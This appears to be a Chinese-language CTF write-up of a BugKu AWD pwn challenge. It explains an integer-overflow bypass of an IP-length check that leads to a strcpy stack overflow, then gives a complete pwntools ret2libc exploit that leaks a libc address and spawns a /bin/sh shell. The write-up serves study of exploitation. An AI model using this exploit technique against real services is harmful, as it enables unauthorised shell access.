BugKu AWD S2-1

没打bugku awd,听说今天没人打pwn题。既然但是有附件的话,我就看看。

打开程序发现相对以前有点意思,那就做一下。

程序很简单,输入一个ip地址,校验长度是否合法,然后校验ip是否合法,绕过了这两个检测就可以通过strcpy实现栈溢出。

int inet_pton(int af, const char *src, void *dst);

DESCRIPTION
This function converts the character string src into a network address
structure in the af address family, then copies the network address
structure to dst. The af argument must be either AF_INET or AF_INET6.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
_BOOL4 __cdecl validateSize(char *s)
{
  unsigned __int8 v2; // [esp+2Fh] [ebp-9h]

  v2 = strlen(s);
  return v2 > 1u && v2 <= 0x28u;
}

int __cdecl validateIP(int a1)
{
  char cp[41]; // [esp+7h] [ebp-51h] BYREF
  int dst; // [esp+38h] [ebp-20h] BYREF
  int i; // [esp+4Ch] [ebp-Ch]

  for ( i = 0; i <= 40; ++i )
  {
    if ( *(_BYTE *)(i + a1) == '.' )
    {
      cp[i] = 0;
      return inet_pton(10, cp, &dst);
        //arg0为10,经测试是ipv6,这里比较蛋疼,因为我在头文件里找不到定义
    }
    cp[i] = *(_BYTE *)(i + a1);
  }
  return inet_pton(10, cp, &dst);
}

参数s的输入是fgets(s, 0x1FFFD, stdin)实现的,s长度为0x1FFFE。

刚开始想着绕过validateSize(char *s)直接在合法地址后加一个’\x00’,strlen就不会继续识别了,但是后面的strcpy也是遇’\x00’截止,这样绕不会造成栈溢出。

仔细看代码发现,它会将’.’视作’\x00’校验,但不会动我们本身的字符串,而且v2是unsigned int_8,所以可以通过整数溢出来绕过检测。

我直接把绕过封装成一个函数。

1
2
3
4
5
6
7
[*] '/home/giantbranch/Desktop/raoguo/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

NX关了而且有RWX段,第一反应是ret2shellcode,但是输入是在栈上,所以还是ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import requests
from pwn import *

elf_path = './pwn'
elf = ELF(elf_path)
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
context.binary = elf
context.log_level = 'debug'

p = process(elf_path)

sda = lambda x,y:p.sendlineafter(x,y)
sdl = lambda x:p.sendline(x)
rct = lambda x:p.recvuntil(x)
prt = lambda x:log.info('\x1b[01;38;5;214m' + x + '==>' + hex(eval(x)) + '\x1b[0m')

def valid(payload):
	ipv6 = 'CDCD:910A:2222:5498:8475:1111:3900:2020.'
	ret =  ipv6.ljust(44,'a') + 'a'*8 + payload
	return ret.ljust(0x128,'a')

#gdb.attach(p,'b *0x08048817')
# LEAK 
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x0804889C
payload1 = p32(puts_plt) + p32(main_addr) + p32(puts_got)
payload1 = valid(payload1)
sdl(payload1)
rct('// TODO - Finish later...\n')
leak = u32(p.recv(4))
prt('leak')
libcbase = leak - libc.symbols['puts']
prt('libcbase')
# ATTACK
system = libcbase + libc.symbols['system']
binsh = libcbase +libc.search('/bin/sh').next()
payload2 = p32(system) + p32(main_addr) + p32(binsh) 
payload2 = valid(payload2)
sdl(payload2)
#sdl(payload)

p.interactive()

总结

整数溢出+基础栈溢出,inet_pton()虽然平时没遇到过,但是通过man一下就能知道是做什么的,拿数据试一下就行了。

没人打可能是因为靶机环境里没有ips.txt(那也太猪比了),也可能就是pwn手都不想打Bugku AWD了

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

江南大学通信工程在读本科生;江南大学信息安全俱乐部19级成员、现任俱乐部负责人;SU现役成员